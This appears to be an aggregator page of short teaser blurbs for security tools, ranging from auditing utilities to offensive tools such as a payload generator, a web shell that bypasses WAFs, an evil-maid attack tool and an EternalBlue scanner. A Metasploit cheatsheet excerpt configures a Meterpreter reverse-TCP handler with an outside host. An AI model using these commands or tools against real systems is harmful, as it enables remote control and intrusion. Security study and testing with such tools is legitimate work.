Lynis 2.5.2 – Security Auditing Tool for Unix/Linux Systems
We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made....
View Articlesmap – Shellcode Mapper
Handy tool for shellcode analysis. Demo video Requirements objdump Installation and execution Then you can download smap by cloning the Git repository: ▼Advertisements git clone...
View ArticleCHAOS Framework – Generate Payloads and Control Remote Machines
CHAOS Framework allows generate payloads and controls remote machines. DISCLAIMER The use of the CHAOS Framework is COMPLETE RESPONSIBILITY of the END-USER. Developer assumes NO liability and is NOT...
View Articledork-cli – Command-line Google Dork Tool
dork-cli is a Python-based command-line Google Dork Tool to perform searches againsts Google’s custom search engine. A command-line option is always good as it allows you to script it in as part of...
View ArticleCloudFail – Utilize misconfigured DNS and old database records to find hidden...
CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all...
View ArticleBluto – DNS Recon, Zone Transfer & Brute Forcer
Bluto is a Python-based tool for DNS recon, DNS zone transfer testing, DNS wild card checks, DNS brute forcing, e-mail enumeration and more. The target domain is queried for MX and NS records....
View ArticleMetasploit Cheatsheet
Cheat sheet of Metasploit… Commands are as follows.. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set...
View ArticleEternal – An internet scanner for Eternal Blue [exploit CVE-2017-0144]
Eternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. Requirements masscan metasploit-framework How to Install git clone https://github.com/peterpt/eternal_scanner.git cd...
View ArticleHardentools – Utility that disables a number of risky Windows features
Hardentools is a collection of simple utilities designed to disable a number of “features” exposed by operating systems (Microsoft Windows, for now), and primary consumer applications. These features,...
View ArticleNagaScan – Distributed Passive Scanner for Web Application
What is NagaScan NagaScan is a distributed passive vulnerability scanner for Web application. What NagaScan do NagaScan currently support some common Web application vulnerabilities, e.g. XSS, SQL...
View ArticleReconDog – An All In One Tool For All Your Basic Information Gathering Needs
Recon Dog is an all in one tool for all your basic information gathering needs. It uses APIs to gather all the information so your identity is not exposed. Downloading and running Recon Dog Enter the...
View ArticleCyberChef – Cyber Swiss Army Knife
CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption...
View Articleinforfinder – Tool To Collect Information Of Any Domains Pointing At Some...
nforfinder is a tool made to collect information of any domain pointing at a server (ip,domain,range,file). Requires python libs: pyRequests and pyDNS -First, you need to install complementary...
View ArticleWSSAT – Web Service Security Assessment Tool
WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL...
View ArticleDAws – Advanced Web Shell
There’s multiple things that makes DAws better than every Web Shell out there: Bypasses Security Systems(IPS, WAFs,etc) like Suhosin(uses up to 20 php functions just to get a command executed). Drops...
View ArticleASTo – An IoT Network Security Analysis Tool and Visualizer
ASTo is security analysis tool for IoT networks. It is developed to support the Apparatus security framework. ASTo is based onelectron and cytoscape.js. The icons are provided by Google’s Material...
View ArticleEvilAbigail – Automated Evil Maid Attack For Linux
EvilAbigail is a Python-based tool that allows you run an automated Evil Maid attack on Linux systems, this is the Initrd encrypted root fs attack. An Evil Maid attack is a type of attack that targets...
View ArticleTwiga – A Tool That Enumerates Android Devices For Information Useful In...
A tool that enumerates Android devices for information useful in understanding its internals and for exploit development. It supports android 4.2 to android 7.1.1 Requirements The most current ADB must...
View ArticleVulnreport – Pentesting Management And Automation Platform
Vulnreport is a platform for managing penetration tests and generating well-formatted, actionable findings reports without the normal overhead that takes up security engineer’s time. The platform is...
View ArticleRastLeak – Tool To Automatic Leak Information Using Hacking With Engine Searches
Tool to automatic leak information using Hacking with engine searches. How to install Install requirements with: pip install -r requirements.txt How to use: python rastleak.py Usage: $ python...
View Article